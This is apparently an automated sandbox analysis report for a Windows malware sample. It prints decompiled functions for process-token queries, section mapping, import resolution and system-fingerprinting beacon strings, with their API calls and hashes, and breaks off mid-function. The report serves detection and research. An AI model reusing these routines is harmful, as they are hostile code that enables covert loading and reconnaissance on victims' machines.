                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3239747167-8415677
                                                                                                                                  • Opcode ID: 69427bb5ba356ecdc30dbbe87c1744846a578a071353badfe372911104b21090
                                                                                                                                  • Instruction ID: 97fdc650158b49a717cfddfa2d6db13aa77a0698258981b06b21b1d563238368
                                                                                                                                  • Opcode Fuzzy Hash: 69427bb5ba356ecdc30dbbe87c1744846a578a071353badfe372911104b21090
                                                                                                                                  • Instruction Fuzzy Hash: EE31D8B2A00205EFDB24DFA9DD81AAEB7F9AF58310F118469F545E3211DB30DE129B11
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E97DFDA, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,000008C9,00003000,00000040,000008C9,6E97DA28), ref: 6E97E097
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000128,00003000,00000040,6E97DA88), ref: 6E97E0CE
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00016396,00003000,00000040), ref: 6E97E12E
                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E97E164
                                                                                                                                  • VirtualProtect.KERNEL32(6E8D0000,00000000,00000004,6E97DFB9), ref: 6E97E269
                                                                                                                                  • VirtualProtect.KERNEL32(6E8D0000,00001000,00000004,6E97DFB9), ref: 6E97E290
                                                                                                                                  • VirtualProtect.KERNEL32(00000000,?,00000002,6E97DFB9), ref: 6E97E35D
                                                                                                                                  • VirtualProtect.KERNEL32(00000000,?,00000002,6E97DFB9,?), ref: 6E97E3B3
                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E97E3CF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682810308.000000006E97D000.00000040.00020000.sdmp, Offset: 6E97D000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2574235972-0
                                                                                                                                  • Opcode ID: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
                                                                                                                                  • Instruction ID: 1532731c19047ecb8d8048b55b1c182ca6af44890a261f2af2e2ca0a8a368f86
                                                                                                                                  • Opcode Fuzzy Hash: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
                                                                                                                                  • Instruction Fuzzy Hash: 4FD17C725206219FDB22CF54CC80A9237E7FF49B91F0841A8ED4A9F34AD370AA05CF64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A35D10, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 38%
                                                                                                                                  			E00A35D10(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00A375F6(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00A34AAB(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                                                                                                  0x00a35d1d
                                                                                                                                  0x00a35d1e
                                                                                                                                  0x00a35d1f
                                                                                                                                  0x00a35d20
                                                                                                                                  0x00a35d21
                                                                                                                                  0x00a35d25
                                                                                                                                  0x00a35d2c
                                                                                                                                  0x00a35d3b
                                                                                                                                  0x00a35d3e
                                                                                                                                  0x00a35d41
                                                                                                                                  0x00a35d48
                                                                                                                                  0x00a35d4b
                                                                                                                                  0x00a35d4e
                                                                                                                                  0x00a35d51
                                                                                                                                  0x00a35d54
                                                                                                                                  0x00a35d5f
                                                                                                                                  0x00a35d61
                                                                                                                                  0x00a35d6a
                                                                                                                                  0x00a35d72
                                                                                                                                  0x00a35d74
                                                                                                                                  0x00a35d86
                                                                                                                                  0x00a35d90
                                                                                                                                  0x00a35d94
                                                                                                                                  0x00a35da3
                                                                                                                                  0x00a35da7
                                                                                                                                  0x00a35db0
                                                                                                                                  0x00a35db8
                                                                                                                                  0x00a35db8
                                                                                                                                  0x00a35dba
                                                                                                                                  0x00a35dba
                                                                                                                                  0x00a35dc2
                                                                                                                                  0x00a35dc8
                                                                                                                                  0x00a35dcc
                                                                                                                                  0x00a35dcc
                                                                                                                                  0x00a35dd7

                                                                                                                                  APIs
                                                                                                                                  • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00A35D57
                                                                                                                                  • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00A35D6A
                                                                                                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00A35D86
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00A35DA3
                                                                                                                                  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 00A35DB0
                                                                                                                                  • NtClose.NTDLL(?), ref: 00A35DC2
                                                                                                                                  • NtClose.NTDLL(00000000), ref: 00A35DCC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2575439697-0
                                                                                                                                  • Opcode ID: 1fdf1d80f0ad875da5ed523dae32c1f8528dadb31d5542790ef937137cbc15d9
                                                                                                                                  • Instruction ID: 1af93d6c5599cf6269e6bf1a2ce28c6d7c4b7c12964806b457c3c5a8b4484432
                                                                                                                                  • Opcode Fuzzy Hash: 1fdf1d80f0ad875da5ed523dae32c1f8528dadb31d5542790ef937137cbc15d9
                                                                                                                                  • Instruction Fuzzy Hash: 3F21F5B6900218BBDB01DFA5DD45EDEBFBDEF08790F104126FA01F6121E7719A459BA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8E5600, Relevance: 9.4, APIs: 4, Strings: 1, Instructions: 623COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,000008BB), ref: 6E8E5696
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,6E97B7A0,000008BB), ref: 6E8E576F
                                                                                                                                    • Part of subcall function 6E8E72B0: task.LIBCPMTD ref: 6E8E7352
                                                                                                                                    • Part of subcall function 6E8EBA20: swap.LIBCPMTD ref: 6E8EBA39
                                                                                                                                  • CreateSemaphoreW.KERNEL32(00000000,00000007,00000007,00000000,6E967144,?,?,?,?,?,00000000), ref: 6E8E5950
                                                                                                                                  • std::locale::locale.LIBCPMTD ref: 6E8E59D8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileModuleName$CreateSemaphorestd::locale::localeswaptask
                                                                                                                                  • String ID: ?
                                                                                                                                  • API String ID: 756721536-1684325040
                                                                                                                                  • Opcode ID: 4523ba4582d832fb38a7824027b2ac74240894e4a52113d9145a3a0acb66f331
                                                                                                                                  • Instruction ID: 4548c44c63027359671f4cf293aaa57d58b060eb914cd35c51bf336499526202
                                                                                                                                  • Opcode Fuzzy Hash: 4523ba4582d832fb38a7824027b2ac74240894e4a52113d9145a3a0acb66f331
                                                                                                                                  • Instruction Fuzzy Hash: 7F524EF0A08624CFCF08CFA9D990AA977B6FF8B305F108929D54597794D7B8984DCB44
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8D13B8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                  			E6E8D13B8(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6E8D1273(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                                                                                                                  0x6e8d13c1
                                                                                                                                  0x6e8d13c8
                                                                                                                                  0x6e8d13c9
                                                                                                                                  0x6e8d13ca
                                                                                                                                  0x6e8d13cb
                                                                                                                                  0x6e8d13cc
                                                                                                                                  0x6e8d13dd
                                                                                                                                  0x6e8d13e1
                                                                                                                                  0x6e8d13f5
                                                                                                                                  0x6e8d13f8
                                                                                                                                  0x6e8d13fb
                                                                                                                                  0x6e8d1402
                                                                                                                                  0x6e8d1405
                                                                                                                                  0x6e8d140c
                                                                                                                                  0x6e8d140f
                                                                                                                                  0x6e8d1412
                                                                                                                                  0x6e8d1415
                                                                                                                                  0x6e8d141a
                                                                                                                                  0x6e8d1455
                                                                                                                                  0x6e8d141c
                                                                                                                                  0x6e8d141f
                                                                                                                                  0x6e8d1425
                                                                                                                                  0x6e8d142a
                                                                                                                                  0x6e8d142e
                                                                                                                                  0x6e8d144c
                                                                                                                                  0x6e8d1430
                                                                                                                                  0x6e8d1437
                                                                                                                                  0x6e8d1445
                                                                                                                                  0x6e8d1445
                                                                                                                                  0x6e8d142e
                                                                                                                                  0x6e8d145d

                                                                                                                                  APIs
                                                                                                                                  • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000), ref: 6E8D1415
                                                                                                                                    • Part of subcall function 6E8D1273: NtMapViewOfSection.NTDLL(00000000,000000FF,6E8D142A,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6E8D142A,?), ref: 6E8D12A0
                                                                                                                                  • memset.NTDLL ref: 6E8D1437
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Section$CreateViewmemset
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 2533685722-2766056989
                                                                                                                                  • Opcode ID: c61638305c421a85b3a3431d95797393ed2746fec166c54830a0c940b8607d89
                                                                                                                                  • Instruction ID: 2272e3e92d4f3fd131c8ba9fe8df28148912dcb4862802d22405b4accff3489a
                                                                                                                                  • Opcode Fuzzy Hash: c61638305c421a85b3a3431d95797393ed2746fec166c54830a0c940b8607d89
                                                                                                                                  • Instruction Fuzzy Hash: BD210EB5D00209AFDB01CFE9C8849DEFBBAEF48354F108929E655F3210D7359A488BA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8D1DE5, Relevance: 3.1, APIs: 2, Instructions: 92libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E6E8D1DE5(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6e8d41c0;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}




























                                                                                                                                  0x6e8d1de5
                                                                                                                                  0x6e8d1dee
                                                                                                                                  0x6e8d1df3
                                                                                                                                  0x6e8d1df9
                                                                                                                                  0x6e8d1e02
                                                                                                                                  0x6e8d1e08
                                                                                                                                  0x6e8d1e0a
                                                                                                                                  0x6e8d1e0d
                                                                                                                                  0x6e8d1e12
                                                                                                                                  0x6e8d1e19
                                                                                                                                  0x6e8d1e19
                                                                                                                                  0x6e8d1e1d
                                                                                                                                  0x6e8d1e23
                                                                                                                                  0x6e8d1e28
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1e2e
                                                                                                                                  0x6e8d1e38
                                                                                                                                  0x6e8d1e3a
                                                                                                                                  0x6e8d1e3d
                                                                                                                                  0x6e8d1e40
                                                                                                                                  0x6e8d1e44
                                                                                                                                  0x6e8d1e4c
                                                                                                                                  0x6e8d1e4e
                                                                                                                                  0x6e8d1e51
                                                                                                                                  0x6e8d1eb9
                                                                                                                                  0x6e8d1eb9
                                                                                                                                  0x6e8d1ebd
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1e56
                                                                                                                                  0x6e8d1e5c
                                                                                                                                  0x6e8d1e5e
                                                                                                                                  0x6e8d1e71
                                                                                                                                  0x6e8d1e74
                                                                                                                                  0x6e8d1e74
                                                                                                                                  0x6e8d1e74
                                                                                                                                  0x6e8d1e78
                                                                                                                                  0x6e8d1e60
                                                                                                                                  0x6e8d1e60
                                                                                                                                  0x6e8d1e68
                                                                                                                                  0x6e8d1e6a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1e6a
                                                                                                                                  0x6e8d1e58
                                                                                                                                  0x6e8d1e58
                                                                                                                                  0x6e8d1e6c
                                                                                                                                  0x6e8d1e6c
                                                                                                                                  0x6e8d1e6c
                                                                                                                                  0x6e8d1e7b
                                                                                                                                  0x6e8d1e7e
                                                                                                                                  0x6e8d1e80
                                                                                                                                  0x6e8d1e87
                                                                                                                                  0x6e8d1e82
                                                                                                                                  0x6e8d1e82
                                                                                                                                  0x6e8d1e82
                                                                                                                                  0x6e8d1e8f
                                                                                                                                  0x6e8d1e95
                                                                                                                                  0x6e8d1e97
                                                                                                                                  0x6e8d1ec7
                                                                                                                                  0x6e8d1e99
                                                                                                                                  0x6e8d1e99
                                                                                                                                  0x6e8d1e9c
                                                                                                                                  0x6e8d1e9e
                                                                                                                                  0x6e8d1ea6
                                                                                                                                  0x6e8d1ea6
                                                                                                                                  0x6e8d1eab
                                                                                                                                  0x6e8d1ead
                                                                                                                                  0x6e8d1eb4
                                                                                                                                  0x6e8d1eb6
                                                                                                                                  0x6e8d1eb6
                                                                                                                                  0x6e8d1eb6
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1eb6
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1e97
                                                                                                                                  0x6e8d1e46
                                                                                                                                  0x6e8d1e46
                                                                                                                                  0x6e8d1e4a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1e4a
                                                                                                                                  0x6e8d1eca
                                                                                                                                  0x6e8d1eca
                                                                                                                                  0x6e8d1ed1
                                                                                                                                  0x6e8d1ed6
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1edc
                                                                                                                                  0x6e8d1ee7
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1ee7
                                                                                                                                  0x6e8d1ede
                                                                                                                                  0x6e8d1ede
                                                                                                                                  0x6e8d1ee4
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1ee4
                                                                                                                                  0x6e8d1e12
                                                                                                                                  0x6e8d1ee8
                                                                                                                                  0x6e8d1eed

                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E8D1E1D
                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 6E8D1E8F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2574300362-0
                                                                                                                                  • Opcode ID: c05c3bcfc00b571293a5b4bd135c08ce172492a101b51d22a3505280b25eaf15
                                                                                                                                  • Instruction ID: 08456b38ea66de3be4953aba8b02c5d180792135f7d7dabfe2330cb1a50ca75e
                                                                                                                                  • Opcode Fuzzy Hash: c05c3bcfc00b571293a5b4bd135c08ce172492a101b51d22a3505280b25eaf15
                                                                                                                                  • Instruction Fuzzy Hash: 7F313AB5A0060ADFDB44CF99C890AADB7F9FF45310F104869D811EB240E730EA49CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8D1273, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                  			E6E8D1273(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                                                                                                                  0x6e8d1285
                                                                                                                                  0x6e8d128b
                                                                                                                                  0x6e8d1299
                                                                                                                                  0x6e8d12a0
                                                                                                                                  0x6e8d12a5
                                                                                                                                  0x6e8d12ab
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d12ac
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • NtMapViewOfSection.NTDLL(00000000,000000FF,6E8D142A,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6E8D142A,?), ref: 6E8D12A0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: SectionView
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1323581903-0
                                                                                                                                  • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                  • Instruction ID: 70924ee3e64d5e86eef3f1d7b2d619ade16b276e5972e05c6a971949feda0d4e
                                                                                                                                  • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                  • Instruction Fuzzy Hash: BBF01CB690420CBFEB119FA9CC85C9FBBBDEB44394B104E39B152E1090D631AE4C8A60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A344A4, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 201memorystringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 66%
                                                                                                                                  			E00A344A4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				void* _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0xa3d018; // 0x53709a90
				asm("bswap eax");
				_t27 =  *0xa3d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0xa3d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0xa3d00c; // 0xeec43f25
				asm("bswap eax");
				_t30 =  *0xa3d2e0; // 0x296a5a8
				_t3 = _t30 + 0xa3e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3f874, _t29, _t28, _t27, _t26,  *0xa3d02c,  *0xa3d004, _t25);
				_t33 = E00A35B60();
				_t34 =  *0xa3d2e0; // 0x296a5a8
				_t4 = _t34 + 0xa3e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37; // executed
				_t38 = E00A31BBF(_t91); // executed
				_t96 = _t38;
				if(_t96 != 0) {
					_t83 =  *0xa3d2e0; // 0x296a5a8
					_t6 = _t83 + 0xa3e8cc; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0xa3d270, 0, _t96);
				}
				_t97 = E00A3137A();
				if(_t97 != 0) {
					_t78 =  *0xa3d2e0; // 0x296a5a8
					_t8 = _t78 + 0xa3e8d4; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0xa3d270, 0, _t97);
				}
				_t98 =  *0xa3d364; // 0x33a95b0
				_a32 = E00A33857(0xa3d00a, _t98 + 4);
				_t42 =  *0xa3d308; // 0x0
				if(_t42 != 0) {
					_t74 =  *0xa3d2e0; // 0x296a5a8
					_t11 = _t74 + 0xa3e8ae; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0xa3d304; // 0x0
				if(_t43 != 0) {
					_t71 =  *0xa3d2e0; // 0x296a5a8
					_t13 = _t71 + 0xa3e885; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t46 = RtlAllocateHeap( *0xa3d270, 0, 0x800); // executed
					_t100 = _t46;
					if(_t100 != 0) {
						E00A3A811(GetTickCount());
						_t50 =  *0xa3d364; // 0x33a95b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0xa3d364; // 0x33a95b0
						__imp__(_t54 + 0x40);
						_t56 =  *0xa3d364; // 0x33a95b0
						_t103 = E00A31974(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0xa3c2ac);
							_push(_t103);
							_t62 = E00A338CA();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E00A32A4E(0xffffffffffffffff, _t100, _v28, _v24); // executed
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E00A347D5();
								}
								HeapFree( *0xa3d270, 0, _v44);
							}
							HeapFree( *0xa3d270, 0, _t103);
						}
